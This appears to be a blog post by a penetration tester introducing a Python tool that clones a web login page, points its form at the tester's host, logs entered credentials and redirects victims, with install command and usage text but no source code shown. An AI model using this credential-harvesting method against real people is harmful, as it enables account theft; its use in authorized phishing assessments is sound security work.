Adventures in Penetration Testing: Let’s Go Phishing

Phishing and social engineering engagements are often unique to each customer, however; I often find that a customer just wants one of their web pages, like their web email sign on page, copied. This link to this phishing site is then emailed out to the victims to determine their susceptibility in clicking on the link as well as entering credentials.

The standard process is to use httrack to download a copy of the page, then modify the FORM tag to POST/GET to our phishing site, save whatever values are submitted, and redirect to the real page. This is a bit of a pain due to the process being fairly manual in nature. I know you can use something like the Social Engineering Toolkit (SET), but that can be a pain to setup and is often a little heavy duty for what my company needs.

I recently began learning Python, which I love so far by the way, and thought that this might be a good area in which I could develop something useful. So I wrote a phishing script that will take the URL you point it at and replicate it, replacing the FORM ACTION with your host, logging all entered data, and forwarding the victim on to their site (along with what they submitted).

The script does this by downloading the base HTML for the page and ensuring A, IMG, LINK, and SCRIPT SRC tags point back to the original site, while modifying the FORM ACTION tag to point back at the malicious site. This is simple in that very little is downloaded and it leaves little room for something to get messed up in the visual presentation.
The script relies on Mechanize, BeautifulSoup4, and CherryPy. These can be installed with:

  easy_install mechanize beautifulsoup4 cherrypy

Some features that I would like to add include:

  • Integrate with the Browser Exploitation Framework (BeEF)
  • Add the ability to step through a few clicks, rather than a simple one page reflect back and then redirect

This is the first script I have written in Python, so it is probably pretty ugly to anyone with experience in the language. You can download here and enjoy with:

usage: [-h] --phish PHISH --replace REPLACE [--port PORT] [--ssl]
               [--sslchain SSLCHAIN] [--sslcert SSLCERT] [--sslkey SSLKEY]

Automatically setup a phishing site.

optional arguments:
  -h, --help           show this help message and exit
  --phish PHISH        the full URL to phish back to the victim (must include
                       http(s):// (default: None)
  --replace REPLACE    the IP/FQDN to replace FORM actions with (must include
                       http(s):// (default: None)
  --port PORT          the port to start the listening web server on (default:
  --ssl                enable SSL on the running port (default: 0)
  --sslchain SSLCHAIN  certificate chain file to use when ssl option is
                       enabled (default: chain.crt)
  --sslcert SSLCERT    certificate file to use to use when ssl option is
                       enabled (default: ssl.crt)
  --sslkey SSLKEY      private key file to use to use when ssl option is
                       enabled (default: ssl.key)

Example: --phish --replace --port 443 --ssl --sslchain chain.crt --sslcert ssl.crt
--sslkey ssl.key


Comment back for some optional features that you think would be useful for this lightweight script.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: